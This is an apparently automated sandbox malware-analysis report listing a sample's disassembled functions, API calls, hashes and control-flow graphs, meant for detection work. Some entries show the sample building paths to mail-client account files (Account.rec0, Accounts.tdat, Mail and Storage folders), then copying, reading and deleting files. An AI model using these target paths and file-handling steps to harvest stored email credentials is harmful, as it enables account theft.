                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 254469556-0
                                                                                                                                                                                          • Opcode ID: 3a8c9c0a58ebe0be9ab4ac8e9df9326fe737d6378bec1cebc18dbd204f57c31b
                                                                                                                                                                                          • Instruction ID: 04a8b038483ba4f4f3c9b47516b2137daa10db52d9651934d5cf26364b10a080
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a8c9c0a58ebe0be9ab4ac8e9df9326fe737d6378bec1cebc18dbd204f57c31b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 30314A75D4531DDBDB11DFA0C9897CDBBB8AF08304F1040AAE44CAB251EB74AA86CF45
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 374D2264 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 374D2276
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 374D2285
                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 374D228E
                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 374D229B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                          • Opcode ID: a0dbe265310c2ecbe321e373a88112dda145dee917c348f7e07fb992233f021d
                                                                                                                                                                                          • Instruction ID: d2eb80b09369b2aa815157022f9f91e527b05eef13043f78eb06c4c9b289b0f8
                                                                                                                                                                                          • Opcode Fuzzy Hash: a0dbe265310c2ecbe321e373a88112dda145dee917c348f7e07fb992233f021d
                                                                                                                                                                                          • Instruction Fuzzy Hash: B8F09D70C10208EBCF01DBB0C54AA9EBBF8EF48209F5184969402F6101E638AB068F50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 374D2B1C Relevance: 6.0, APIs: 4, Instructions: 12COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,374D2C3B,374DD1DC,00000017), ref: 374D2B21
                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(374DD1DC,?,374D2C3B,374DD1DC,00000017), ref: 374D2B2A
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409,?,374D2C3B,374DD1DC,00000017), ref: 374D2B35
                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,374D2C3B,374DD1DC,00000017), ref: 374D2B3C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3231755760-0
                                                                                                                                                                                          • Opcode ID: 99ee4d88fb70834085a514620ff861c9f611ef34a44c5b5e84a536dda799b5c7
                                                                                                                                                                                          • Instruction ID: e4d24de2d40244ffd553c0e9c9660a491833a72b704739f80d7dfb77f0e9c206
                                                                                                                                                                                          • Opcode Fuzzy Hash: 99ee4d88fb70834085a514620ff861c9f611ef34a44c5b5e84a536dda799b5c7
                                                                                                                                                                                          • Instruction Fuzzy Hash: F9D012318C4204EBC7026BE0CD0EB593F2CEB8531AF004002F749B2042CB39A403CF51
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 374D60E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 374D61DA
                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 374D61E4
                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 374D61F1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                                          • Opcode ID: 8ad99c00da1d7c8496e408275e9ee6fe62839de80e75594e554095d42f1d1593
                                                                                                                                                                                          • Instruction ID: 223433f12845213d3e7419f54743e3c1adf3ba689efc6a6909830860cbcd4123
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ad99c00da1d7c8496e408275e9ee6fe62839de80e75594e554095d42f1d1593
                                                                                                                                                                                          • Instruction Fuzzy Hash: B431D37494122CDBCB21DF24D9887CDBBB8AF48360F5041DAE85CA7261E734AB828F45
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 374D4AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,374D4A8A,?,374E2238,0000000C,374D4BBD,00000000,00000000,00000001,374D2082,374E2108,0000000C,374D1F3A,?), ref: 374D4AD5
                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,374D4A8A,?,374E2238,0000000C,374D4BBD,00000000,00000000,00000001,374D2082,374E2108,0000000C,374D1F3A,?), ref: 374D4ADC
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 374D4AEE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                          • Opcode ID: 8bfbe8c0916e30f04691639e3fffc3e706c7f86ae902effc3593d8b4750228d0
                                                                                                                                                                                          • Instruction ID: e8158e6a6eb2f51f3163318e6f1cbff6337483716147eef27301c11ab39a68df
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8bfbe8c0916e30f04691639e3fffc3e706c7f86ae902effc3593d8b4750228d0
                                                                                                                                                                                          • Instruction Fuzzy Hash: F6E0B636540208EFCF02AF68DD19A897B69EF84395F504025FD85AB222DB39F943CA55
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 374D2933 Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 374D294C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2325560087-0
                                                                                                                                                                                          • Opcode ID: 492d265912a687e6f6ec4e6b44f1d908b97e95da83bb197aaff52b97c8244b5c
                                                                                                                                                                                          • Instruction ID: ff059e7192c8821fa3957df3675c934c8da6743390b5ef13cedaf70ed03c43db
                                                                                                                                                                                          • Opcode Fuzzy Hash: 492d265912a687e6f6ec4e6b44f1d908b97e95da83bb197aaff52b97c8244b5c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 97418CB5911205CBEB11CF54C5927AABBF4FB48320F1495AAD445FB766E338BA01CB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 374D724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                                          • Opcode ID: d4da7bd33ff82c20983a44dad564a5fabbfbd045f73cffc87506e612a1d36563
                                                                                                                                                                                          • Instruction ID: 46cadd6ec12443bdd4de71e0153c4ba70d1559c93736c4b10ed28a847cd21d09
                                                                                                                                                                                          • Opcode Fuzzy Hash: d4da7bd33ff82c20983a44dad564a5fabbfbd045f73cffc87506e612a1d36563
                                                                                                                                                                                          • Instruction Fuzzy Hash: 22A01230640102CF4705CE30420B20C35AC654419870040565408E0011F72890024A00
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 374D1CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 374D1D1B
                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 374D1D37
                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 374D1D4B
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 374D1D58
                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 374D1D72
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 374D1D7D
                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 374D1D8A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1454806937-0
                                                                                                                                                                                          • Opcode ID: 259396bf6019c5cf928061461d34c3989d8f859d994e5493b49d0749120de019
                                                                                                                                                                                          • Instruction ID: b5d21f7b36875a6c3d3c3fa3a8c1b1b49eb0db7fca995ed5f1b7bcf3ff5e133d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 259396bf6019c5cf928061461d34c3989d8f859d994e5493b49d0749120de019
                                                                                                                                                                                          • Instruction Fuzzy Hash: FE2130B1D8121CEFE711DFA08C9DEEA7AACEB48354F000566F951E2141D778AE468E70
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 374D39BE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 242 374d39be-374d39c8 243 374d3a6e-374d3a71 242->243 244 374d39cd-374d39dd 243->244 245 374d3a77 243->245 246 374d39df-374d39e2 244->246 247 374d39ea-374d3a03 LoadLibraryExW 244->247 248 374d3a79-374d3a7d 245->248 249 374d39e8 246->249 250 374d3a6b 246->250 251 374d3a55-374d3a5e 247->251 252 374d3a05-374d3a0e GetLastError 247->252 253 374d3a67-374d3a69 249->253 250->243 251->253 254 374d3a60-374d3a61 FreeLibrary 251->254 255 374d3a45 252->255 256 374d3a10-374d3a22 call 374d55f6 252->256 253->250 257 374d3a7e-374d3a80 253->257 254->253 259 374d3a47-374d3a49 255->259 256->255 262 374d3a24-374d3a36 call 374d55f6 256->262 257->248 259->251 261 374d3a4b-374d3a53 259->261 261->250 262->255 265 374d3a38-374d3a43 LoadLibraryExW 262->265 265->259
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                                                          • API String ID: 0-537541572
                                                                                                                                                                                          • Opcode ID: bbc11a54ac5bb8fdb2a7484283024eee8f6726794a11e889d4a6e3dca2b49378
                                                                                                                                                                                          • Instruction ID: d169e983fdf57296e38d749e4cdd46c3ca3192bc8ed5c6f69dd8887a39aa39ac
                                                                                                                                                                                          • Opcode Fuzzy Hash: bbc11a54ac5bb8fdb2a7484283024eee8f6726794a11e889d4a6e3dca2b49378
                                                                                                                                                                                          • Instruction Fuzzy Hash: E211D576F41711EBD7128A648CA5B9A37589F49BB0F000552E8D9B7383FA34F9028AE1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 374D1000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 374D1038
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 374D104B
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 374D1061
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 374D1075
                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 374D1090
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 374D10B8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3594823470-0
                                                                                                                                                                                          • Opcode ID: 98f8f1689d8f1269968a0c5423fa7ca14105ef9b94c6ba4e0d45a310add92849
                                                                                                                                                                                          • Instruction ID: ed6d89ae08fc282b4ef01f9273554afb4eefb3ab67cac8a91b634c06bde8db10
                                                                                                                                                                                          • Opcode Fuzzy Hash: 98f8f1689d8f1269968a0c5423fa7ca14105ef9b94c6ba4e0d45a310add92849
                                                                                                                                                                                          • Instruction Fuzzy Hash: 25218375900318DBCF11DA60DC68EDF3768EF84328F104156EC95A71A2DE34BA86CF81
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 374D11EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 374D1E89: lstrlenW.KERNEL32(?,?,?,?,?,374D10DF,?,?,?,00000000), ref: 374D1E9A
                                                                                                                                                                                            • Part of subcall function 374D1E89: lstrcatW.KERNEL32(?,?), ref: 374D1EAC
                                                                                                                                                                                            • Part of subcall function 374D1E89: lstrlenW.KERNEL32(?,?,374D10DF,?,?,?,00000000), ref: 374D1EB3
                                                                                                                                                                                            • Part of subcall function 374D1E89: lstrlenW.KERNEL32(?,?,374D10DF,?,?,?,00000000), ref: 374D1EC8
                                                                                                                                                                                            • Part of subcall function 374D1E89: lstrcatW.KERNEL32(?,374D10DF), ref: 374D1ED3
                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 374D122A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$lstrcat$AttributesFile
                                                                                                                                                                                          • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                          • API String ID: 1475205934-1520055953
                                                                                                                                                                                          • Opcode ID: 3576a8a626bc692d6fcebb643365370dd2f2193b5bb7bd028d3e25ceb210b67f
                                                                                                                                                                                          • Instruction ID: 53cca6a098d1e3d672c3f0f4388a5eb06eae2857d90b1d4f5fb00df87663432b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3576a8a626bc692d6fcebb643365370dd2f2193b5bb7bd028d3e25ceb210b67f
                                                                                                                                                                                          • Instruction Fuzzy Hash: A721D7B9E50208AAEB109790DC91FEE7339EF80715F10055AFA04EB1D1E6B53D81875A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 374D4B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 306 374d4b39-374d4b61 GetModuleHandleExW 307 374d4b86-374d4b8a 306->307 308 374d4b63-374d4b76 GetProcAddress 306->308 311 374d4b8c-374d4b8f FreeLibrary 307->311 312 374d4b95-374d4ba2 call 374d2ada 307->312 309 374d4b78-374d4b83 308->309 310 374d4b85 308->310 309->310 310->307 311->312
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,374D4AEA,?,?,374D4A8A,?,374E2238,0000000C,374D4BBD,00000000,00000000), ref: 374D4B59
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 374D4B6C
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,374D4AEA,?,?,374D4A8A,?,374E2238,0000000C,374D4BBD,00000000,00000000,00000001,374D2082), ref: 374D4B8F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                          • Opcode ID: 5eb0d86100fd5b8f554e6cc91a68b886891c14eac1f938381df6a24747fe14ed
                                                                                                                                                                                          • Instruction ID: 7b3ec074b09f60ebf465ebf20ceaac53ead058ff37c1a3f8d2d3aade8a87b7b3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5eb0d86100fd5b8f554e6cc91a68b886891c14eac1f938381df6a24747fe14ed
                                                                                                                                                                                          • Instruction Fuzzy Hash: 22F08C31940108FBCB029FA4CC19BEDBFB9EF48265F4041A9E845B6252DB34B942CE91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 374D9492 Relevance: 7.7, APIs: 5, Instructions: 152fileCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 316 374d9492-374d94ef GetConsoleCP 317 374d94f5-374d9511 316->317 318 374d9632-374d9644 call 374d2ada 316->318 319 374d952c-374d953d call 374d7c19 317->319 320 374d9513-374d952a 317->320 327 374d953f-374d9542 319->327 328 374d9563-374d9565 319->328 322 374d9566-374d9575 call 374d79e6 320->322 322->318 330 374d957b-374d959b WideCharToMultiByte 322->330 331 374d9609-374d9628 327->331 332 374d9548-374d955a call 374d79e6 327->332 328->322 330->318 333 374d95a1-374d95b7 WriteFile 330->333 331->318 332->318 339 374d9560-374d9561 332->339 335 374d95b9-374d95ca 333->335 336 374d962a-374d9630 GetLastError 333->336 335->318 338 374d95cc-374d95d0 335->338 336->318 340 374d95fe-374d9601 338->340 341 374d95d2-374d95f0 WriteFile 338->341 339->330 340->317 343 374d9607 340->343 341->336 342 374d95f2-374d95f6 341->342 342->318 344 374d95f8-374d95fb 342->344 343->318 344->340
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,374D9C07,?,00000000,?,00000000,00000000), ref: 374D94D4
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 374D9590
                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,374D9C07,00000000,?,?,?,?,?,?,?,?,?,374D9C07,?), ref: 374D95AF
                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,374D9C07,00000000,?,?,?,?,?,?,?,?,?,374D9C07,?), ref: 374D95E8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileWrite$ByteCharConsoleMultiWide
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 977765425-0
                                                                                                                                                                                          • Opcode ID: 247afc1ecb322a6f1740388e9876982ab8884a5810ef757dc91a890956a429c2
                                                                                                                                                                                          • Instruction ID: c4c760d8c087b78525a778cb68a404ef268c1c4f8d3aef994a403728012b8067
                                                                                                                                                                                          • Opcode Fuzzy Hash: 247afc1ecb322a6f1740388e9876982ab8884a5810ef757dc91a890956a429c2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2751A5B1D40205AFDB00CFA4C8A5AEEBBF4EF09310F14455AE595F7292E630F942CB61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 374D1E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,374D10DF,?,?,?,00000000), ref: 374D1E9A
                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 374D1EAC
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,374D10DF,?,?,?,00000000), ref: 374D1EB3
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,374D10DF,?,?,?,00000000), ref: 374D1EC8
                                                                                                                                                                                          • lstrcatW.KERNEL32(?,374D10DF), ref: 374D1ED3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$lstrcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 493641738-0
                                                                                                                                                                                          • Opcode ID: bab4932a8c1e5e09c0a2dddc3bd649a0e515dae4aa8c1f07ed0338a66071ebff
                                                                                                                                                                                          • Instruction ID: 69ef5a9edde782cba5a12a56c45a84deca6a1898f9b08cd9b34a89de0c731d63
